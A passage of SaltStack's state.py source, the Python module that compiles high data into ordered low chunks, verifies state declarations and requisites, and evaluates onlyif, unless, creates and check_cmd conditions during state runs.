an execution module in that instead of just executing a command, it
ensures that a certain state is present on the system.
The data sent to the state calls is as follows:
{ 'state': '<state module name>',
'fun': '<state function name>',
'name': '<the name argument passed to all states>'
'argn': '<arbitrary argument, can have many of these>'
}
"""
import copy
import datetime
import fnmatch
import logging
import os
import random
import re
import site
import sys
import time
import traceback
import salt.fileclient
import salt.loader
import salt.minion
import salt.pillar
import salt.syspaths as syspaths
import salt.transport.client
import salt.utils.args
import salt.utils.crypt
import salt.utils.data
import salt.utils.decorators.state
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.immutabletypes as immutabletypes
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.url
# Explicit late import to avoid circular import. DO NOT MOVE THIS.
import salt.utils.yamlloader as yamlloader
from salt.exceptions import CommandExecutionError, SaltRenderError, SaltReqTimeoutError
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext.six.moves import map, range, reload_module
from salt.serializers.msgpack import deserialize as msgpack_deserialize
from salt.serializers.msgpack import serialize as msgpack_serialize
from salt.template import compile_template, compile_template_str
from salt.utils.odict import DefaultOrderedDict, OrderedDict
# pylint: enable=import-error,no-name-in-module,redefined-builtin
log = logging.getLogger(__name__)
# These are keywords passed to state module functions which are to be used
# by salt in this state module and not on the actual state module function
STATE_REQUISITE_KEYWORDS = frozenset(
[
"onchanges",
"onchanges_any",
"onfail",
"onfail_any",
"onfail_all",
"onfail_stop",
"prereq",
"prerequired",
"watch",
"watch_any",
"require",
"require_any",
"listen",
]
)
STATE_REQUISITE_IN_KEYWORDS = frozenset(
["onchanges_in", "onfail_in", "prereq_in", "watch_in", "require_in", "listen_in"]
)
STATE_RUNTIME_KEYWORDS = frozenset(
[
"fun",
"state",
"check_cmd",
"failhard",
"onlyif",
"unless",
"creates",
"retry",
"order",
"parallel",
"prereq",
"prereq_in",
"prerequired",
"reload_modules",
"reload_grains",
"reload_pillar",
"runas",
"runas_password",
"fire_event",
"saltenv",
"use",
"use_in",
"__env__",
"__sls__",
"__id__",
"__orchestration_jid__",
"__pub_user",
"__pub_arg",
"__pub_jid",
"__pub_fun",
"__pub_tgt",
"__pub_ret",
"__pub_pid",
"__pub_tgt_type",
"__prereq__",
"__prerequired__",
]
)
STATE_INTERNAL_KEYWORDS = STATE_REQUISITE_KEYWORDS.union(
STATE_REQUISITE_IN_KEYWORDS
).union(STATE_RUNTIME_KEYWORDS)
def _odict_hashable(self):
return id(self)
OrderedDict.__hash__ = _odict_hashable
def split_low_tag(tag):
"""
Take a low tag and split it back into the low dict that it came from
"""
state, id_, name, fun = tag.split("_|-")
return {"state": state, "__id__": id_, "name": name, "fun": fun}
def _gen_tag(low):
"""
Generate the running dict tag string from the low data structure
"""
return "{0[state]}_|-{0[__id__]}_|-{0[name]}_|-{0[fun]}".format(low)
def _clean_tag(tag):
"""
Make tag name safe for filenames
"""
return salt.utils.files.safe_filename_leaf(tag)
def _l_tag(name, id_):
low = {
"name": "listen_{}".format(name),
"__id__": "listen_{}".format(id_),
"state": "Listen_Error",
"fun": "Listen_Error",
}
return _gen_tag(low)
def _calculate_fake_duration():
"""
Generate a NULL duration for when states do not run
but we want the results to be consistent.
"""
utc_start_time = datetime.datetime.utcnow()
local_start_time = utc_start_time - (
datetime.datetime.utcnow() - datetime.datetime.now()
)
utc_finish_time = datetime.datetime.utcnow()
start_time = local_start_time.time().isoformat()
delta = utc_finish_time - utc_start_time
# duration in milliseconds.microseconds
duration = (delta.seconds * 1000000 + delta.microseconds) / 1000.0
return start_time, duration
def get_accumulator_dir(cachedir):
"""
Return the directory that accumulator data is stored in, creating it if it
doesn't exist.
"""
fn_ = os.path.join(cachedir, "accumulator")
if not os.path.isdir(fn_):
# accumulator_dir is not present, create it
os.makedirs(fn_)
return fn_
def trim_req(req):
"""
Trim any function off of a requisite
"""
reqfirst = next(iter(req))
if "." in reqfirst:
return {reqfirst.split(".")[0]: req[reqfirst]}
return req
def state_args(id_, state, high):
"""
Return a set of the arguments passed to the named state
"""
args = set()
if id_ not in high:
return args
if state not in high[id_]:
return args
for item in high[id_][state]:
if not isinstance(item, dict):
continue
if len(item) != 1:
continue
args.add(next(iter(item)))
return args
def find_name(name, state, high):
"""
Scan high data for the id referencing the given name and return a list of (IDs, state) tuples that match
Note: if `state` is sls, then we are looking for all IDs that match the given SLS
"""
ext_id = []
if name in high:
ext_id.append((name, state))
# if we are requiring an entire SLS, then we need to add ourselves to everything in that SLS
elif state == "sls":
for nid, item in high.items():
if item["__sls__"] == name:
ext_id.append((nid, next(iter(item))))
# otherwise we are requiring a single state, lets find it
else:
# We need to scan for the name
for nid in high:
if state in high[nid]:
if isinstance(high[nid][state], list):
for arg in high[nid][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if arg[next(iter(arg))] == name:
ext_id.append((nid, state))
return ext_id
def find_sls_ids(sls, high):
"""
Scan for all ids in the given sls and return them in a dict; {name: state}
"""
ret = []
for nid, item in high.items():
try:
sls_tgt = item["__sls__"]
except TypeError:
if nid != "__exclude__":
log.error(
"Invalid non-dict item '%s' in high data. Value: %r", nid, item
)
continue
else:
if sls_tgt == sls:
for st_ in item:
if st_.startswith("__"):
continue
ret.append((nid, st_))
return ret
def format_log(ret):
"""
Format the state into a log message
"""
msg = ""
if isinstance(ret, dict):
# Looks like the ret may be a valid state return
if "changes" in ret:
# Yep, looks like a valid state return
chg = ret["changes"]
if not chg:
if ret["comment"]:
msg = ret["comment"]
else:
msg = "No changes made for {0[name]}".format(ret)
elif isinstance(chg, dict):
if "diff" in chg:
if isinstance(chg["diff"], str):
msg = "File changed:\n{}".format(chg["diff"])
if all([isinstance(x, dict) for x in chg.values()]):
if all([("old" in x and "new" in x) for x in chg.values()]):
msg = "Made the following changes:\n"
for pkg in chg:
old = chg[pkg]["old"]
if not old and old not in (False, None):
old = "absent"
new = chg[pkg]["new"]
if not new and new not in (False, None):
new = "absent"
# This must be able to handle unicode as some package names contain
# non-ascii characters like "Français" or "Español". See Issue #33605.
msg += "'{}' changed from '{}' to '{}'\n".format(
pkg, old, new
)
if not msg:
msg = str(ret["changes"])
if ret["result"] is True or ret["result"] is None:
log.info(msg)
else:
log.error(msg)
else:
# catch unhandled data
log.info(str(ret))
def master_compile(master_opts, minion_opts, grains, id_, saltenv):
"""
Compile the master side low state data, and build the hidden state file
"""
st_ = MasterHighState(master_opts, minion_opts, grains, id_, saltenv)
return st_.compile_highstate()
def ishashable(obj):
try:
hash(obj)
except TypeError:
return False
return True
def mock_ret(cdata):
"""
Returns a mocked return dict with information about the run, without
executing the state function
"""
# As this is expanded it should be sent into the execution module
# layer or it should be turned into a standalone loader system
if cdata["args"]:
name = cdata["args"][0]
else:
name = cdata["kwargs"]["name"]
return {
"name": name,
"comment": "Not called, mocked",
"changes": {},
"result": True,
}
class StateError(Exception):
"""
Custom exception class.
"""
class Compiler:
"""
Class used to compile and manage the High Data structure
"""
def __init__(self, opts, renderers):
self.opts = opts
self.rend = renderers
def render_template(self, template, **kwargs):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
**kwargs
)
if not high:
return high
return self.pad_funcs(high)
def pad_funcs(self, high):
"""
Turns dot delimited function refs into function strings
"""
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
# Is this is a short state? It needs to be padded!
if "." in high[name]:
comps = high[name].split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
if len(comps) >= 2:
# Merge the comps
comps[1] = ".".join(comps[1 : len(comps)])
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
if name.startswith("__"):
continue
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}".format(name, body["__sls__"], type(name).__name__)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
(
"The {}"
" statement in state '{}' in SLS '{}' "
"needs to be formed as a list"
).format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = {"state": state}
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"is SLS {}\n"
).format(
str(req_val), body["__sls__"],
)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
reqs[req_val]["state"]
== reqs[name][req_val]
):
err = (
"A recursive "
"requisite was found, SLS "
'"{}" ID "{}" ID "{}"'
).format(
body["__sls__"],
name,
req_val,
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
(
"Multiple dictionaries "
"defined in argument of state '{}' in SLS"
" '{}'"
).format(name, body["__sls__"])
)
if not fun:
if state == "require" or state == "watch":
continue
errors.append(
(
"No function declared in state '{}' in" " SLS '{}'"
).format(state, body["__sls__"])
)
elif fun > 1:
errors.append(
"Too many functions declared in state '{}' in "
"SLS '{}'".format(state, body["__sls__"])
)
return errors
def order_chunks(self, chunks):
"""
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
"""
cap = 1
for chunk in chunks:
if "order" in chunk:
if not isinstance(chunk["order"], int):
continue
chunk_order = chunk["order"]
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if "order" not in chunk:
chunk["order"] = cap
continue
if not isinstance(chunk["order"], (int, float)):
if chunk["order"] == "last":
chunk["order"] = cap + 1000000
elif chunk["order"] == "first":
chunk["order"] = 0
else:
chunk["order"] = cap
if "name_order" in chunk:
chunk["order"] = chunk["order"] + chunk.pop("name_order") / 10000.0
if chunk["order"] < 0:
chunk["order"] = cap + 1000000 + chunk["order"]
chunk["name"] = salt.utils.data.decode(chunk["name"])
chunks.sort(
key=lambda chunk: (
chunk["order"],
"{0[state]}{0[name]}{0[fun]}".format(chunk),
)
)
return chunks
def compile_high_data(self, high):
"""
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
"""
chunks = []
for name, body in high.items():
if name.startswith("__"):
continue
for state, run in body.items():
funcs = set()
names = []
if state.startswith("__"):
continue
chunk = {"state": state, "name": name}
if "__sls__" in body:
chunk["__sls__"] = body["__sls__"]
if "__env__" in body:
chunk["__env__"] = body["__env__"]
chunk["__id__"] = name
for arg in run:
if isinstance(arg, str):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in arg.items():
if key == "names":
for _name in val:
if _name not in names:
names.append(_name)
continue
else:
chunk.update(arg)
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(iter(entry.keys()))
live["name"] = low_name
list(map(live.update, entry[low_name]))
else:
live["name"] = entry
live["name_order"] = name_order
name_order = name_order + 1
for fun in funcs:
live["fun"] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live["fun"] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def apply_exclude(self, high):
"""
Read in the __exclude__ list and remove all excluded objects from the
high data
"""
if "__exclude__" not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop("__exclude__")
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(iter(exc.keys()))
if key == "sls":
ex_sls.add(exc["sls"])
elif key == "id":
ex_id.add(exc["id"])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associtaed ids
for name, body in high.items():
if name.startswith("__"):
continue
if body.get("__sls__", "") in ex_sls:
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
class State:
"""
Class used to execute salt states
"""
def __init__(
self,
opts,
pillar_override=None,
jid=None,
pillar_enc=None,
proxy=None,
context=None,
mocked=False,
loader="states",
initial_pillar=None,
):
self.states_loader = loader
if "grains" not in opts:
opts["grains"] = salt.loader.grains(opts)
self.opts = opts
self.proxy = proxy
self._pillar_override = pillar_override
if pillar_enc is not None:
try:
pillar_enc = pillar_enc.lower()
except AttributeError:
pillar_enc = str(pillar_enc).lower()
self._pillar_enc = pillar_enc
log.debug("Gathering pillar data for state run")
if initial_pillar and not self._pillar_override:
self.opts["pillar"] = initial_pillar
else:
# Compile pillar data
self.opts["pillar"] = self._gather_pillar()
# Reapply overrides on top of compiled pillar
if self._pillar_override:
self.opts["pillar"] = salt.utils.dictupdate.merge(
self.opts["pillar"],
self._pillar_override,
self.opts.get("pillar_source_merging_strategy", "smart"),
self.opts.get("renderer", "yaml"),
self.opts.get("pillar_merge_lists", False),
)
log.debug("Finished gathering pillar data for state run")
self.state_con = context or {}
self.load_modules()
self.active = set()
self.mod_init = set()
self.pre = {}
self.__run_num = 0
self.jid = jid
self.instance_id = str(id(self))
self.inject_globals = {}
self.mocked = mocked
def _gather_pillar(self):
"""
Whenever a state run starts, gather the pillar data fresh
"""
if self._pillar_override:
if self._pillar_enc:
try:
self._pillar_override = salt.utils.crypt.decrypt(
self._pillar_override,
self._pillar_enc,
translate_newlines=True,
renderers=getattr(self, "rend", None),
opts=self.opts,
valid_rend=self.opts["decrypt_pillar_renderers"],
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to decrypt pillar override: %s", exc)
if isinstance(self._pillar_override, str):
# This can happen if an entire pillar dictionary was passed as
# a single encrypted string. The override will have been
# decrypted above, and should now be a stringified dictionary.
# Use the YAML loader to convert that to a Python dictionary.
try:
self._pillar_override = yamlloader.load(
self._pillar_override, Loader=yamlloader.SaltYamlSafeLoader
)
except Exception as exc: # pylint: disable=broad-except
log.error("Failed to load CLI pillar override")
log.exception(exc)
if not isinstance(self._pillar_override, dict):
log.error("Pillar override was not passed as a dictionary")
self._pillar_override = None
pillar = salt.pillar.get_pillar(
self.opts,
self.opts["grains"],
self.opts["id"],
self.opts["saltenv"],
pillar_override=self._pillar_override,
pillarenv=self.opts.get("pillarenv"),
)
return pillar.compile_pillar()
def _mod_init(self, low):
"""
Check the module initialization function, if this is the first run
of a state package that has a mod_init function, then execute the
mod_init function in the state module.
"""
# ensure that the module is loaded
try:
self.states[
"{}.{}".format(low["state"], low["fun"])
] # pylint: disable=W0106
except KeyError:
return
minit = "{}.mod_init".format(low["state"])
if low["state"] not in self.mod_init:
if minit in self.states._dict:
mret = self.states[minit](low)
if not mret:
return
self.mod_init.add(low["state"])
def _mod_aggregate(self, low, running, chunks):
"""
Execute the aggregation systems to runtime modify the low chunk
"""
agg_opt = self.functions["config.option"]("state_aggregate")
if "aggregate" in low:
agg_opt = low["aggregate"]
if agg_opt is True:
agg_opt = [low["state"]]
elif not isinstance(agg_opt, list):
return low
if low["state"] in agg_opt and not low.get("__agg__"):
agg_fun = "{}.mod_aggregate".format(low["state"])
if agg_fun in self.states:
try:
low = self.states[agg_fun](low, chunks, running)
low["__agg__"] = True
except TypeError:
log.error("Failed to execute aggregate for state %s", low["state"])
return low
def _run_check(self, low_data):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False, "comment": []}
cmd_opts = {}
# Set arguments from cmd.run state as appropriate
POSSIBLE_CMD_ARGS = (
"cwd",
"root",
"runas",
"env",
"prepend_path",
"umask",
"timeout",
"success_retcodes",
)
for run_cmd_arg in POSSIBLE_CMD_ARGS:
cmd_opts[run_cmd_arg] = low_data.get(run_cmd_arg)
if "shell" in low_data:
cmd_opts["shell"] = low_data["shell"]
elif "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
if "onlyif" in low_data:
_ret = self._run_check_onlyif(low_data, cmd_opts)
ret["result"] = _ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
ret["skip_watch"] = _ret["skip_watch"]
if "unless" in low_data:
_ret = self._run_check_unless(low_data, cmd_opts)
# If either result is True, the returned result should be True
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
if "creates" in low_data:
_ret = self._run_check_creates(low_data)
ret["result"] = _ret["result"] or ret["result"]
ret["comment"].append(_ret["comment"])
if "skip_watch" in _ret:
# If either result is True, the returned result should be True
ret["skip_watch"] = _ret["skip_watch"] or ret["skip_watch"]
return ret
def _run_check_function(self, entry):
"""Format slot args and run unless/onlyif function."""
fun = entry.pop("fun")
args = entry.pop("args") if "args" in entry else []
cdata = {"args": args, "kwargs": entry}
self.format_slots(cdata)
return self.functions[fun](*cdata["args"], **cdata["kwargs"])
def _run_check_onlyif(self, low_data, cmd_opts):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False}
if not isinstance(low_data["onlyif"], list):
low_data_onlyif = [low_data["onlyif"]]
else:
low_data_onlyif = low_data["onlyif"]
def _check_cmd(cmd):
if cmd != 0 and ret["result"] is False:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
elif cmd == 0:
ret.update({"comment": "onlyif condition is true", "result": False})
for entry in low_data_onlyif:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
except CommandExecutionError:
# Command failed, notify onlyif to skip running the item
cmd = 100
log.debug("Last command return code: %s", cmd)
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in onlyif: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif not result:
ret.update(
{
"comment": "onlyif condition is false",
"skip_watch": True,
"result": True,
}
)
else:
ret.update({"comment": "onlyif condition is true", "result": False})
else:
ret.update(
{
"comment": "onlyif execution failed, bad type passed",
"result": False,
}
)
return ret
def _run_check_unless(self, low_data, cmd_opts):
"""
Check that unless doesn't return 0, and that onlyif returns a 0.
"""
ret = {"result": False}
if not isinstance(low_data["unless"], list):
low_data_unless = [low_data["unless"]]
else:
low_data_unless = low_data["unless"]
def _check_cmd(cmd):
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
elif cmd != 0:
ret.update({"comment": "unless condition is false", "result": False})
for entry in low_data_unless:
if isinstance(entry, str):
try:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
except CommandExecutionError:
# Command failed, so notify unless to skip the item
cmd = 0
_check_cmd(cmd)
elif isinstance(entry, dict):
if "fun" not in entry:
ret["comment"] = "no `fun` argument in unless: {}".format(entry)
log.warning(ret["comment"])
return ret
get_return = entry.pop("get_return", None)
result = self._run_check_function(entry)
if get_return:
result = salt.utils.data.traverse_dict_and_list(result, get_return)
if self.state_con.get("retcode", 0):
_check_cmd(self.state_con["retcode"])
elif result:
ret.update(
{
"comment": "unless condition is true",
"skip_watch": True,
"result": True,
}
)
else:
ret.update(
{"comment": "unless condition is false", "result": False}
)
else:
ret.update(
{
"comment": "unless condition is false, bad type passed",
"result": False,
}
)
# No reason to stop, return ret
return ret
def _run_check_cmd(self, low_data):
"""
Alter the way a successful state run is determined
"""
ret = {"result": False}
cmd_opts = {}
if "shell" in self.opts["grains"]:
cmd_opts["shell"] = self.opts["grains"].get("shell")
for entry in low_data["check_cmd"]:
cmd = self.functions["cmd.retcode"](
entry, ignore_retcode=True, python_shell=True, **cmd_opts
)
log.debug("Last command return code: %s", cmd)
if cmd == 0 and ret["result"] is False:
ret.update(
{
"comment": "check_cmd determined the state succeeded",
"result": True,
}
)
elif cmd != 0:
ret.update(
{
"comment": "check_cmd determined the state failed",
"result": False,
}
)
return ret
return ret
def _run_check_creates(self, low_data):
"""
Check that listed files exist
"""
ret = {"result": False}
if isinstance(low_data["creates"], str) and os.path.exists(low_data["creates"]):
ret["comment"] = "{} exists".format(low_data["creates"])
ret["result"] = True
ret["skip_watch"] = True
elif isinstance(low_data["creates"], list) and all(
[os.path.exists(path) for path in low_data["creates"]]
):
ret["comment"] = "All files in creates exist"
ret["result"] = True
ret["skip_watch"] = True
else:
ret["comment"] = "Creates files not found"
ret["result"] = False
return ret
def reset_run_num(self):
"""
Rest the run_num value to 0
"""
self.__run_num = 0
def _load_states(self):
"""
Read the state loader value and loadup the correct states subsystem
"""
if self.states_loader == "thorium":
self.states = salt.loader.thorium(
self.opts, self.functions, {}
) # TODO: Add runners, proxy?
else:
self.states = salt.loader.states(
self.opts,
self.functions,
self.utils,
self.serializers,
context=self.state_con,
proxy=self.proxy,
)
def load_modules(self, data=None, proxy=None):
"""
Load the modules into the state
"""
log.info("Loading fresh modules for state activity")
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts, self.state_con, utils=self.utils, proxy=self.proxy
)
if isinstance(data, dict):
if data.get("provider", False):
if isinstance(data["provider"], str):
providers = [{data["state"]: data["provider"]}]
elif isinstance(data["provider"], list):
providers = data["provider"]
else:
providers = {}
for provider in providers:
for mod in provider:
funcs = salt.loader.raw_mod(
self.opts, provider[mod], self.functions
)
if funcs:
for func in funcs:
f_key = "{}{}".format(mod, func[func.rindex(".") :])
self.functions[f_key] = funcs[func]
self.serializers = salt.loader.serializers(self.opts)
self._load_states()
self.rend = salt.loader.render(
self.opts,
self.functions,
states=self.states,
proxy=self.proxy,
context=self.state_con,
)
def module_refresh(self):
"""
Refresh all the modules
"""
log.debug("Refreshing modules...")
if self.opts["grains"].get("os") != "MacOS":
# In case a package has been installed into the current python
# process 'site-packages', the 'site' module needs to be reloaded in
# order for the newly installed package to be importable.
try:
reload_module(site)
except RuntimeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
except TypeError:
log.error(
"Error encountered during module reload. Modules were not reloaded."
)
self.load_modules()
if not self.opts.get("local", False) and self.opts.get("multiprocessing", True):
self.functions["saltutil.refresh_modules"]()
def check_refresh(self, data, ret):
"""
Check to see if the modules for this state instance need to be updated,
only update if the state is a file or a package and if it changed
something. If the file function is managed check to see if the file is a
possible module type, e.g. a python, pyx, or .so. Always refresh if the
function is recurse, since that can lay down anything.
"""
_reload_modules = False
if data.get("reload_grains", False):
log.debug("Refreshing grains...")
self.opts["grains"] = salt.loader.grains(self.opts)
_reload_modules = True
if data.get("reload_pillar", False):
log.debug("Refreshing pillar...")
self.opts["pillar"] = self._gather_pillar()
_reload_modules = True
if not ret["changes"]:
if data.get("force_reload_modules", False):
self.module_refresh()
return
if data.get("reload_modules", False) or _reload_modules:
# User explicitly requests a reload
self.module_refresh()
return
if data["state"] == "file":
if data["fun"] == "managed":
if data["name"].endswith((".py", ".pyx", ".pyo", ".pyc", ".so")):
self.module_refresh()
elif data["fun"] == "recurse":
self.module_refresh()
elif data["fun"] == "symlink":
if "bin" in data["name"]:
self.module_refresh()
elif data["state"] in ("pkg", "ports", "pip"):
self.module_refresh()
def verify_data(self, data):
"""
Verify the data, return an error statement if something is wrong
"""
errors = []
if "state" not in data:
errors.append('Missing "state" data')
if "fun" not in data:
errors.append('Missing "fun" data')
if "name" not in data:
errors.append('Missing "name" data')
if data["name"] and not isinstance(data["name"], str):
errors.append(
"ID '{}' {}is not formed as a string, but is a {}".format(
data["name"],
"in SLS '{}' ".format(data["__sls__"]) if "__sls__" in data else "",
type(data["name"]).__name__,
)
)
if errors:
return errors
full = data["state"] + "." + data["fun"]
if full not in self.states:
if "__sls__" in data:
errors.append(
"State '{}' was not found in SLS '{}'".format(full, data["__sls__"])
)
reason = self.states.missing_fun_string(full)
if reason:
errors.append("Reason: {}".format(reason))
else:
errors.append("Specified state '{}' was not found".format(full))
else:
# First verify that the parameters are met
aspec = salt.utils.args.get_function_argspec(self.states[full])
arglen = 0
deflen = 0
if isinstance(aspec.args, list):
arglen = len(aspec.args)
if isinstance(aspec.defaults, tuple):
deflen = len(aspec.defaults)
for ind in range(arglen - deflen):
if aspec.args[ind] not in data:
errors.append(
"Missing parameter {} for state {}".format(
aspec.args[ind], full
)
)
# If this chunk has a recursive require, then it will cause a
# recursive loop when executing, check for it
reqdec = ""
if "require" in data:
reqdec = "require"
if "watch" in data:
# Check to see if the service has a mod_watch function, if it does
# not, then just require
# to just require extend the require statement with the contents
# of watch so that the mod_watch function is not called and the
# requisite capability is still used
if "{}.mod_watch".format(data["state"]) not in self.states:
if "require" in data:
data["require"].extend(data.pop("watch"))
else:
data["require"] = data.pop("watch")
reqdec = "require"
else:
reqdec = "watch"
if reqdec:
for req in data[reqdec]:
reqfirst = next(iter(req))
if data["state"] == reqfirst:
if fnmatch.fnmatch(data["name"], req[reqfirst]) or fnmatch.fnmatch(
data["__id__"], req[reqfirst]
):
err = (
"Recursive require detected in SLS {} for"
" require {} in ID {}"
).format(data["__sls__"], req, data["__id__"])
errors.append(err)
return errors
def verify_high(self, high):
"""
Verify that the high data is viable and follows the data structure
"""
errors = []
if not isinstance(high, dict):
errors.append("High data is not a dictionary and is invalid")
reqs = OrderedDict()
for name, body in high.items():
try:
if name.startswith("__"):
continue
except AttributeError:
pass
if not isinstance(name, str):
errors.append(
"ID '{}' in SLS '{}' is not formed as a string, but "
"is a {}. It may need to be quoted.".format(
name, body["__sls__"], type(name).__name__
)
)
if not isinstance(body, dict):
err = "The type {} in {} is not formatted as a dictionary".format(
name, body
)
errors.append(err)
continue
for state in body:
if state.startswith("__"):
continue
if body[state] is None:
errors.append(
"ID '{}' in SLS '{}' contains a short declaration "
"({}) with a trailing colon. When not passing any "
"arguments to a state, the colon must be omitted.".format(
name, body["__sls__"], state
)
)
continue
if not isinstance(body[state], list):
errors.append(
"State '{}' in SLS '{}' is not formed as a list".format(
name, body["__sls__"]
)
)
else:
fun = 0
if "." in state:
fun += 1
for arg in body[state]:
if isinstance(arg, str):
fun += 1
if " " in arg.strip():
errors.append(
(
'The function "{}" in state '
'"{}" in SLS "{}" has '
"whitespace, a function with whitespace is "
"not supported, perhaps this is an argument "
'that is missing a ":"'
).format(arg, name, body["__sls__"])
)
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst == "names":
if not isinstance(arg[argfirst], list):
errors.append(
"The 'names' argument in state "
"'{}' in SLS '{}' needs to be "
"formed as a list".format(name, body["__sls__"])
)
if argfirst in ("require", "watch", "prereq", "onchanges"):
if not isinstance(arg[argfirst], list):
errors.append(
"The {} statement in state '{}' in "
"SLS '{}' needs to be formed as a "
"list".format(argfirst, name, body["__sls__"])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = OrderedDict(state=state)
for req in arg[argfirst]:
if isinstance(req, str):
req = {"id": req}
if not isinstance(req, dict):
err = (
"Requisite declaration {}"
" in SLS {} is not formed as a"
" single key dictionary"
).format(req, body["__sls__"])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if "." in req_key:
errors.append(
"Invalid requisite type '{}' "
"in state '{}', in SLS "
"'{}'. Requisite types must "
"not contain dots, did you "
"mean '{}'?".format(
req_key,
name,
body["__sls__"],
req_key[: req_key.find(".")],
)
)
if not ishashable(req_val):
errors.append(
(
'Illegal requisite "{}", '
"please check your syntax.\n"
).format(req_val)
)
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if (
